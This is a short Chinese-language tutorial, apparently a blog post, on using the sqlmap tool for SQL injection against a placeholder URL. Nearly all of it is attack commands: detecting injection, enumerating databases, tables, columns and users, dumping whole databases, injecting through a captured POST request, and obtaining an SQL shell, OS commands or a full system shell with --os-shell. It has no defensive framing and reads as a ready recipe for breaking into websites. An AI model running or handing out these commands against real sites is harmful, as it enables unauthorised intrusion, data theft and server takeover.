初涉sqlmap

一、基本注入（這個工具kali或者bt下面有集成的，這裏附加一個window免py版，提取碼：3ldv）

sqlmap -u http://url/xx.php?id=1  判斷注入

sqlmap -u http://url/xx.php?id=1 --dba   查找數據庫

sqlmap -u http://url/xx.php?id=1 --tables -D 'db_name'   查找表

sqlmap -u http://url/xx.php?id=1 --columns -T 'table_name'   查找列

sqlmap -u http://url/xx.php?id=1 --dump -C 'column_name'    爆數據

sqlmap -u http://url/xx.php?id=1 --dump-all  脫褲（成功之後默認在bin/output目錄下）

二、進階

sqlmap -u http://url/xx.php?id=1 --is-dba   判斷是不是dba權限

sqlmap -u http://url/xx.php?id=1 --users   查看用戶

sqlmap -u http://url/xx.php?id=1 --privilege   判斷權限

三、cookie注入

四、post注入

咱們須要先將post數據包抓取下來；保存到D:/post.txt

sqlmap -u http://url/xx.php -r D:/post.txt  進行注入

　　注：這個網址是驗證輸入的網址

五、shell（這個須要知道網站目錄，而且magic_quotes_off必需爲off狀態）

sqlmap -u http://url/xx.php?id=1 --os-cmd=command   

sqlmap -u http://url/xx.php?id=1 --sql-shell

　　而後能夠執行sql語句

sqlmap -u http://url/xx.php?id=1 --os-shell  直接得到系統的shell